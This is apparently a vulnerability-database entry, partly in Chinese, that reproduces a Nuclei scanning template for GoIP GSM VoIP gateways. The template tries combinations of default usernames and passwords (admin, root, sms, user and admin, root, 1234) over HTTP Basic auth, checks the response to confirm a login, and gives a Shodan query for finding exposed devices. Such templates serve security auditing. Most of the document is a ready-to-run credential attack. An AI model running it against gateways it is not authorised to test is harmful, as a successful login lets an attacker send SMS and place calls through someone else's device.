goip-default-login: GoIP GSM VoIP Gateway - Default Password

日期: 2025-08-01 | 影响软件: GoIP GSM VoIP Gateway | POC: 已公开

漏洞描述

GoIP GSM VoIP Gateway Default Password, Allows attackers to send, receive sms and calls.

PoC代码[已公开]

id: goip-default-login

info:
  name: GoIP GSM VoIP Gateway - Default Password
  author: drfabiocastro
  severity: high
  description: |
    GoIP GSM VoIP Gateway Default Password, Allows attackers to send, receive sms and calls.
  reference:
    - http://en.dbltek.com/
    - https://medium.com/@hackatnow/how-to-create-a-python-script-to-find-goip-gsm-gateway-on-shodan-and-send-sms-ussd-via-goip-e2e203f5d339
    - https://www.voip-systems.ru/assets/files/voip/voip-gsm/User_Manual_1_4_8_16.pdf
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
    cvss-score: 8.3
    cwe-id: CWE-522
  metadata:
    max-request: 12
    shodan-query: 'HTTP/1.0 401 Please Authenticate\r\nWWW-Authenticate: Basic realm="Please Login"'
  tags: default-login,goip,gsm,vuln

http:
  - raw:
      - |
        GET /default/en_US/status.html HTTP/1.1
        Host: {{Hostname}}
        Authorization: Basic {{base64(username + ':' + password)}}

    attack: clusterbomb
    payloads:
      username:
        - admin
        - root
        - sms
        - user
      password:
        - admin
        - root
        - 1234
    host-redirects: true
    max-redirects: 2

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "Status"
          - "GoIP"
          - "Summary"
          - "Logout"
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a00473045022074037455479f69b573c31b8d5a5ebec7cf47583f21d4c85c0776ee49a94c74a8022100a634ba39b743499c36382902ef1c3f60fe18298be23e5b7bc37ce77cc0b43cb6:922c64590222798bb761d5b6d8e72950